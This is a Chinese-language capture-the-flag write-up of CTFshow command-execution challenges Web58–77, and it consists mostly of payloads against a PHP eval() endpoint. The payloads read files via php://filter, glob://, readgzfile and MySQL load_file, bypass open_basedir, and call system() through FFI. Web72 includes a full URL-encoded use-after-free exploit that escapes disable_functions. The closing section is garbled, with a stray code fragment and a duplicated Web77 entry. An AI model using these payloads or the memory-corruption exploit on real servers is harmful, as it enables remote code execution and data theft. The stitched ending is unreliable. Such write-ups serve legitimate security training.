CTFshow-命令执行(Web58-77)

Web58

php"><?php
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}

Warning: system() has been disabled for security reasons in /var/www/html/index.php(17) : eval()'d code on line 1

本题对于passthru，system等命令执行函数都禁用了

c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=flag.php
c=highlight_file(“flag.php”);c=show_source(‘flag.php’);

Web59

php"><?php
// 你们在炫技吗？
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}

c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=flag.php
c=highlight_file(“flag.php”);c=show_source(‘flag.php’);

Web60

php"><?php
// 你们在炫技吗？
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}

c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=flag.php
c=highlight_file(“flag.php”);c=show_source(‘flag.php’);

Web61

php"><?php
// 你们在炫技吗？
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}

c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=flag.php
c=highlight_file(“flag.php”);c=show_source(‘flag.php’);

Web62

php"><?php
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}

c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=flag.php
c=highlight_file(“flag.php”);c=show_source(‘flag.php’);

Web63

php"><?php
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}

c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=flag.php
c=highlight_file(“flag.php”);c=show_source(‘flag.php’);

Web64

php"><?php
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}

c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=flag.php
c=highlight_file(“flag.php”);c=show_source(‘flag.php’);

Web65

php"><?php
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}

c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=flag.php
c=highlight_file(“flag.php”);c=show_source(‘flag.php’);

Web66

php"><?php
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}

0.0

1c=print_r(scandir(“/”));

2c=highlight_file(‘/flag.txt’);

c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=flag.txt

Web67

php"><?php
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);
}else{highlight_file(__FILE__);
}

1c=var_dump(scandir(“/”));

2c=highlight_file(‘/flag.txt’);

c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=/flag.txt

Web68

啥也没

c=var_dump(scandir(“/”));

c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=/flag.txt

c=readgzfile(“/flag.txt”);

readgzfile - 输出一个 gz 文件

Web69

Warning: highlight_file() , var_dump()has been disabled for security reasons in /var/www/html/index.php on line 19

c=var_export(scandir(“/”));

var_export() 函数返回关于传递给该函数的变量的结构信息，和 var_dump()类似，不同的是其返回的是一个合法的 PHP 代码。

c=echo%20implode(“,”,(scandir(‘/’)));

c=echo json_encode(scandir(“/”));

c=readgzfile(“/flag.txt”);
c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=/flag.txt
c=include(‘/flag.txt’);

Web70

c=var_export(scandir(“/”));

c=echo%20implode(“,”,(scandir(‘/’)));

c=echo json_encode(scandir(“/”));

c=readgzfile(“/flag.txt”);
c=include($_POST[‘w’]);&w=php://filter/convert.base64-encode/resource=/flag.txt
c=include(‘/flag.txt’);

Web71

php"><?php
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗？
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);$s = ob_get_contents();ob_end_clean();echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{highlight_file(__FILE__);
}
?>

给了个index.php

ob_end_clean();：清空（擦除）缓冲区并关闭输出缓冲

ob_get_contents();：返回输出缓冲区的内容

echo preg_replace(“/[0-9]|[a-z]/i”,“?”,$s);劫持了输出缓冲并且将数字和字母替换成了?。

后面加上ob_flush();或ob_end_flush();

加上Exit()或者die()也行

c=var_export(scandir(“/”));exit();

c=var_export(scandir(“/”));ob_flush();

c=include(‘/flag.txt’);;exit();

Web72

ctfshow-web入门72-74_ctfshow web72-CSDN博客

ctfshow-web入门-命令执行（web71-web74）_web72-CSDN博客

php"><?php
error_reporting(0);
ini_set('display_errors', 0);
if(isset($_POST['c'])){$c= $_POST['c'];eval($c);$s = ob_get_contents();ob_end_clean();echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{highlight_file(__FILE__);
}
?>

c=var_export(scandir(“/”));exit();

尝试使用 scandir() 函数来扫描根目录，但由于 open_basedir 限制，这个操作被禁止了。

open_basedir 是 PHP 的一个安全配置指令，用来限制 PHP 脚本只能访问特定的目录。

当前配置只允许访问 /var/www/html/ 目录及其子目录，但不允许访问其他目录。

使用 glob:// 伪协议绕过 open_basedir，读取根目录下的文件，payload：

php">c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>

下面这样也行：

php">c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);

解释：

php">$a = new DirectoryIterator("glob:///*"); // 创建一个DirectoryIterator对象，遍历根目录
foreach ($a as $f) { // 遍历每个条目echo($f->__toString() . ' '); // 输出条目的名称，并添加一个空格
}
exit(0); // 终止脚本执行

或者：

php">c=$a=opendir("glob:///*"); while (($file = readdir($a)) !== false){echo $file . "<br>"; };exit();

解释：

php">$a = opendir("glob:///*"); // 打开根目录，并将目录句柄赋值给$a
while (($file = readdir($a)) !== false) { // 循环读取目录中的每个条目echo $file . "<br>"; // 输出每个条目的名称，并添加HTML换行标签
};
exit(); // 终止脚本执行

c=%3f%3e%3c%3fphp%0apwn(%22ls+%2f%3bcat+%2fflag0.txt%22)%3b%0a%0afunction+pwn(%24cmd)+%7b%0a++++global+%24abc%2c+%24helper%2c+%24backtrace%3b%0a++++class+Vuln+%7b%0a++++++++public+%24a%3b%0a++++++++public+function+__destruct()+%7b+%0a++++++++++++global+%24backtrace%3b+%0a++++++++++++unset(%24this-%3ea)%3b%0a++++++++++++%24backtrace+%3d+(new+Exception)-%3egetTrace()%3b+%23+%3b)%0a++++++++++++if(!isset(%24backtrace%5b1%5d%5b%27args%27%5d))+%7b+%23+PHP+%3e%3d+7.4%0a++++++++++++++++%24backtrace+%3d+debug_backtrace()%3b%0a++++++++++++%7d%0a++++++++%7d%0a++++%7d%0a%0a++++class+Helper+%7b%0a++++++++public+%24a%2c+%24b%2c+%24c%2c+%24d%3b%0a++++%7d%0a%0a++++function+str2ptr(%26%24str%2c+%24p+%3d+0%2c+%24s+%3d+8)+%7b%0a++++++++%24address+%3d+0%3b%0a++++++++for(%24j+%3d+%24s-1%3b+%24j+%3e%3d+0%3b+%24j--)+%7b%0a++++++++++++%24address+%3c%3c%3d+8%3b%0a++++++++++++%24address+%7c%3d+ord(%24str%5b%24p%2b%24j%5d)%3b%0a++++++++%7d%0a++++++++return+%24address%3b%0a++++%7d%0a%0a++++function+ptr2str(%24ptr%2c+%24m+%3d+8)+%7b%0a++++++++%24out+%3d+%22%22%3b%0a++++++++for+(%24i%3d0%3b+%24i+%3c+%24m%3b+%24i%2b%2b)+%7b%0a++++++++++++%24out+.%3d+sprintf(%27%25c%27%2c%24ptr+%26+0xff)%3b%0a++++++++++++%24ptr+%3e%3e%3d+8%3b%0a++++++++%7d%0a++++++++return+%24out%3b%0a++++%7d%0a%0a++++function+write(%26%24str%2c+%24p%2c+%24v%2c+%24n+%3d+8)+%7b%0a++++++++%24i+%3d+0%3b%0a++++++++for(%24i+%3d+0%3b+%24i+%3c+%24n%3b+%24i%2b%2b)+%7b%0a++++++++++++%24str%5b%24p+%2b+%24i%5d+%3d+sprintf(%27%25c%27%2c%24v+%26+0xff)%3b%0a++++++++++++%24v+%3e%3e%3d+8%3b%0a++++++++%7d%0a++++%7d%0a%0a++++function+leak(%24addr%2c+%24p+%3d+0%2c+%24s+%3d+8)+%7b%0a++++++++global+%24abc%2c+%24helper%3b%0a++++++++write(%24abc%2c+0x68%2c+%24addr+%2b+%24p+-+0x10)%3b%0a++++++++%24leak+%3d+strlen(%24helper-%3ea)%3b%0a++++++++if(%24s+!%3d+8)+%7b+%24leak+%25%3d+2+%3c%3c+(%24s+*+8)+-+1%3b+%7d%0a++++++++return+%24leak%3b%0a++++%7d%0a%0a++++function+parse_elf(%24base)+%7b%0a++++++++%24e_type+%3d+leak(%24base%2c+0x10%2c+2)%3b%0a%0a++++++++%24e_phoff+%3d+leak(%24base%2c+0x20)%3b%0a++++++++%24e_phentsize+%3d+leak(%24base%2c+0x36%2c+2)%3b%0a++++++++%24e_phnum+%3d+leak(%24base%2c+0x38%2c+2)%3b%0a%0a++++++++for(%24i+%3d+0%3b+%24i+%3c+%24e_phnum%3b+%24i%2b%2b)+%7b%0a++++++++++++%24header+%3d+%24base+%2b+%24e_phoff+%2b+%24i+*+%24e_phentsize%3b%0a++++++++++++%24p_type++%3d+leak(%24header%2c+0%2c+4)%3b%0a++++++++++++%24p_flags+%3d+leak(%24header%2c+4%2c+4)%3b%0a++++++++++++%24p_vaddr+%3d+leak(%24header%2c+0x10)%3b%0a++++++++++++%24p_memsz+%3d+leak(%24header%2c+0x28)%3b%0a%0a++++++++++++if(%24p_type+%3d%3d+1+%26%26+%24p_flags+%3d%3d+6)+%7b+%23+PT_LOAD%2c+PF_Read_Write%0a++++++++++++++++%23+handle+pie%0a++++++++++++++++%24data_addr+%3d+%24e_type+%3d%3d+2+%3f+%24p_vaddr+%3a+%24base+%2b+%24p_vaddr%3b%0a++++++++++++++++%24data_size+%3d+%24p_memsz%3b%0a++++++++++++%7d+else+if(%24p_type+%3d%3d+1+%26%26+%24p_flags+%3d%3d+5)+%7b+%23+PT_LOAD%2c+PF_Read_exec%0a++++++++++++++++%24text_size+%3d+%24p_memsz%3b%0a++++++++++++%7d%0a++++++++%7d%0a%0a++++++++if(!%24data_addr+%7c%7c+!%24text_size+%7c%7c+!%24data_size)%0a++++++++++++return+false%3b%0a%0a++++++++return+%5b%24data_addr%2c+%24text_size%2c+%24data_size%5d%3b%0a++++%7d%0a%0a++++function+get_basic_funcs(%24base%2c+%24elf)+%7b%0a++++++++list(%24data_addr%2c+%24text_size%2c+%24data_size)+%3d+%24elf%3b%0a++++++++for(%24i+%3d+0%3b+%24i+%3c+%24data_size+%2f+8%3b+%24i%2b%2b)+%7b%0a++++++++++++%24leak+%3d+leak(%24data_addr%2c+%24i+*+8)%3b%0a++++++++++++if(%24leak+-+%24base+%3e+0+%26%26+%24leak+-+%24base+%3c+%24data_addr+-+%24base)+%7b%0a++++++++++++++++%24deref+%3d+leak(%24leak)%3b%0a++++++++++++++++%23+%27constant%27+constant+check%0a++++++++++++++++if(%24deref+!%3d+0x746e6174736e6f63)%0a++++++++++++++++++++continue%3b%0a++++++++++++%7d+else+continue%3b%0a%0a++++++++++++%24leak+%3d+leak(%24data_addr%2c+(%24i+%2b+4)+*+8)%3b%0a++++++++++++if(%24leak+-+%24base+%3e+0+%26%26+%24leak+-+%24base+%3c+%24data_addr+-+%24base)+%7b%0a++++++++++++++++%24deref+%3d+leak(%24leak)%3b%0a++++++++++++++++%23+%27bin2hex%27+constant+check%0a++++++++++++++++if(%24deref+!%3d+0x786568326e6962)%0a++++++++++++++++++++continue%3b%0a++++++++++++%7d+else+continue%3b%0a%0a++++++++++++return+%24data_addr+%2b+%24i+*+8%3b%0a++++++++%7d%0a++++%7d%0a%0a++++function+get_binary_base(%24binary_leak)+%7b%0a++++++++%24base+%3d+0%3b%0a++++++++%24start+%3d+%24binary_leak+%26+0xfffffffffffff000%3b%0a++++++++for(%24i+%3d+0%3b+%24i+%3c+0x1000%3b+%24i%2b%2b)+%7b%0a++++++++++++%24addr+%3d+%24start+-+0x1000+*+%24i%3b%0a++++++++++++%24leak+%3d+leak(%24addr%2c+0%2c+7)%3b%0a++++++++++++if(%24leak+%3d%3d+0x10102464c457f)+%7b+%23+ELF+header%0a++++++++++++++++return+%24addr%3b%0a++++++++++++%7d%0a++++++++%7d%0a++++%7d%0a%0a++++function+get_system(%24basic_funcs)+%7b%0a++++++++%24addr+%3d+%24basic_funcs%3b%0a++++++++do+%7b%0a++++++++++++%24f_entry+%3d+leak(%24addr)%3b%0a++++++++++++%24f_name+%3d+leak(%24f_entry%2c+0%2c+6)%3b%0a%0a++++++++++++if(%24f_name+%3d%3d+0x6d6574737973)+%7b+%23+system%0a++++++++++++++++return+leak(%24addr+%2b+8)%3b%0a++++++++++++%7d%0a++++++++++++%24addr+%2b%3d+0x20%3b%0a++++++++%7d+while(%24f_entry+!%3d+0)%3b%0a++++++++return+false%3b%0a++++%7d%0a%0a++++function+trigger_uaf(%24arg)+%7b%0a++++++++%23+str_shuffle+prevents+opcache+string+interning%0a++++++++%24arg+%3d+str_shuffle(%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27)%3b%0a++++++++%24vuln+%3d+new+Vuln()%3b%0a++++++++%24vuln-%3ea+%3d+%24arg%3b%0a++++%7d%0a%0a++++if(stristr(PHP_OS%2c+%27WIN%27))+%7b%0a++++++++die(%27This+PoC+is+for+*nix+systems+only.%27)%3b%0a++++%7d%0a%0a++++%24n_alloc+%3d+10%3b+%23+increase+this+value+if+UAF+fails%0a++++%24contiguous+%3d+%5b%5d%3b%0a++++for(%24i+%3d+0%3b+%24i+%3c+%24n_alloc%3b+%24i%2b%2b)%0a++++++++%24contiguous%5b%5d+%3d+str_shuffle(%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27)%3b%0a%0a++++trigger_uaf(%27x%27)%3b%0a++++%24abc+%3d+%24backtrace%5b1%5d%5b%27args%27%5d%5b0%5d%3b%0a%0a++++%24helper+%3d+new+Helper%3b%0a++++%24helper-%3eb+%3d+function+(%24x)+%7b+%7d%3b%0a%0a++++if(strlen(%24abc)+%3d%3d+79+%7c%7c+strlen(%24abc)+%3d%3d+0)+%7b%0a++++++++die(%22UAF+failed%22)%3b%0a++++%7d%0a%0a++++%23+leaks%0a++++%24closure_handlers+%3d+str2ptr(%24abc%2c+0)%3b%0a++++%24php_heap+%3d+str2ptr(%24abc%2c+0x58)%3b%0a++++%24abc_addr+%3d+%24php_heap+-+0xc8%3b%0a%0a++++%23+fake+value%0a++++write(%24abc%2c+0x60%2c+2)%3b%0a++++write(%24abc%2c+0x70%2c+6)%3b%0a%0a++++%23+fake+reference%0a++++write(%24abc%2c+0x10%2c+%24abc_addr+%2b+0x60)%3b%0a++++write(%24abc%2c+0x18%2c+0xa)%3b%0a%0a++++%24closure_obj+%3d+str2ptr(%24abc%2c+0x20)%3b%0a%0a++++%24binary_leak+%3d+leak(%24closure_handlers%2c+8)%3b%0a++++if(!(%24base+%3d+get_binary_base(%24binary_leak)))+%7b%0a++++++++die(%22Couldn%27t+determine+binary+base+address%22)%3b%0a++++%7d%0a%0a++++if(!(%24elf+%3d+parse_elf(%24base)))+%7b%0a++++++++die(%22Couldn%27t+parse+ELF+header%22)%3b%0a++++%7d%0a%0a++++if(!(%24basic_funcs+%3d+get_basic_funcs(%24base%2c+%24elf)))+%7b%0a++++++++die(%22Couldn%27t+get+basic_functions+address%22)%3b%0a++++%7d%0a%0a++++if(!(%24zif_system+%3d+get_system(%24basic_funcs)))+%7b%0a++++++++die(%22Couldn%27t+get+zif_system+address%22)%3b%0a++++%7d%0a%0a++++%23+fake+closure+object%0a++++%24fake_obj_offset+%3d+0xd0%3b%0a++++for(%24i+%3d+0%3b+%24i+%3c+0x110%3b+%24i+%2b%3d+8)+%7b%0a++++++++write(%24abc%2c+%24fake_obj_offset+%2b+%24i%2c+leak(%24closure_obj%2c+%24i))%3b%0a++++%7d%0a%0a++++%23+pwn%0a++++write(%24abc%2c+0x20%2c+%24abc_addr+%2b+%24fake_obj_offset)%3b%0a++++write(%24abc%2c+0xd0+%2b+0x38%2c+1%2c+4)%3b+%23+internal+func+type%0a++++write(%24abc%2c+0xd0+%2b+0x68%2c+%24zif_system)%3b+%23+internal+func+handler%0a%0a++++(%24helper-%3eb)(%24cmd)%3b%0a++++exit()%3b%0a%7d

Web73

c=var_export(scandir(‘/’));exit();

c=include(“/flagc.txt”);die();

c=readgzfile(“/flagc.txt”);die();

Web74

glob() 函数返回匹配指定模式的文件名或目录。

c=var_export(glob(‘/*’));exit();

c=include(“/flagx.txt”);die();

Web75

payload：

php">c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>

bin dev etc flag36.txt home lib media mnt opt proc root run sbin srv sys tmp usr var

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);

Web76

payload：

php">c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>

bin dev etc flag36.txt home lib media mnt opt proc root run sbin srv sys tmp usr var

c=
try {
$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');
foreach ($dbh->query('select load_file("/flag36d.txt")') as $row) {echo ($row[0]) . "|";
}
$dbh = null;
} catch (PDOException $e) {
echo $e->getMessage();
exit(0);
}
exit(0);

Web77

ctfshow-web入门-命令执行（web75-web77）_ctfshow web75-CSDN博客

用 PHP 中的 FFI（Foreign Function Interface）来调用 C 语言的 system 函数，并执行一个 Shell 命令。

$ffi = FFI::cdef("int system(const char *command);");//创建一个system对象
$a='/readflag > 1.txt';//没有回显的
$ffi->system($a);//通过$ffi去调用system函数
e) {
echo $e->getMessage();
exit(0);
}
exit(0);

Web77

ctfshow-web入门-命令执行（web75-web77）_ctfshow web75-CSDN博客

用 PHP 中的 FFI（Foreign Function Interface）来调用 C 语言的 system 函数，并执行一个 Shell 命令。

$ffi = FFI::cdef("int system(const char *command);");//创建一个system对象
$a='/readflag > 1.txt';//没有回显的
$ffi->system($a);//通过$ffi去调用system函数